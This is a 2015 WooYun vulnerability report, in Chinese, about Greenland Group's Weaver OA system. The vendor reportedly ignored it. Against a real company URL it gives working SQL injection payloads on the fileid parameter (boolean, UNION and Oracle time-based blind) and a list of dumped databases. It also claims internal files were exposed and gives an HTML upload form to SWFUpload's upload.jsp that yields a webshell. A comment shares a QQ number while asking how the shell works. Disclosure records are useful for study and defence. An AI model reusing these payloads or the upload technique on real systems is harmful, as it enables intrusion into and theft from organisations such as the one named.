当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130481

漏洞标题:国企绿地集团泛微OA系统sql注入+内部信息泄漏+getshell(root)

相关厂商:绿地集团

漏洞作者: ShAdow丶

提交时间:2015-07-30 19:04

修复时间:2015-09-13 19:06

公开时间:2015-09-13 19:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

绿地集团是中国第一家也是目前(截止2013年)唯一一家跻身《财富》世界500强的以房地产为主业的企业集团。2014年位居《财富》世界500强第268位。

详细说明:

http://home.ldjt.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1


看见是泛微的oa,直接在wooyun上搜了下,发现挺多利用漏洞,就不一一贴出来参考了哪些。
1.注入参数:fileid

Place: GET
Parameter: fileid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fileid=32 AND 1250=1250&download=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: fileid=-6867 UNION ALL SELECT CHR(58)||CHR(120)||CHR(97)||CHR(113)|
|CHR(58)||CHR(103)||CHR(70)||CHR(100)||CHR(87)||CHR(111)||CHR(82)||CHR(115)||CHR
(97)||CHR(103)||CHR(89)||CHR(58)||CHR(116)||CHR(113)||CHR(103)||CHR(58), NULL, N
ULL, NULL, NULL, NULL, NULL FROM DUAL-- &download=1
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fileid=32 AND 1259=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(100)||CHR
(83)||CHR(67),5)&download=1


available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] DUROAX
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


漏洞证明:

2.

通过遍历fileid参数,发现很多内部文件,下面举一两例子证明下


29WBF9IA~[83}U$ZYJII77E.png


]MIS[}C_BLNS_M9%9Z@7$MF.jpg


3.利用表单提交

<form method='post' action='http://www.xxoo.com/tools/SWFUpload/upload.jsp'  enctype="multipart/form-data" > 
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>


直接getshell

~PT`8_QTWNZ@[Q}C}@9@9BS.png


C]T94QKMCBYI3KVSS~P36DP.png


内部东西应该很多,就不深入了。

修复方案:

升级打补丁。

版权声明:转载请注明来源 ShAdow丶@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论

  1. 2015-09-13 19:48 | 李叫兽就四李叫兽 ( 路人 | Rank:23 漏洞数:8 | 啦啦啦啦)

    如何利用表单提交获得shell?求联系方式,我q372941497

  2. 2015-09-13 20:43 | ShAdow丶 ( 实习白帽子 | Rank:76 漏洞数:9 | i am a fans of kimYeWon.)

    @李叫兽就四李叫兽 就是自己构造上传表单 这个洞我也参看了泛微OA的洞 里面有exp的 。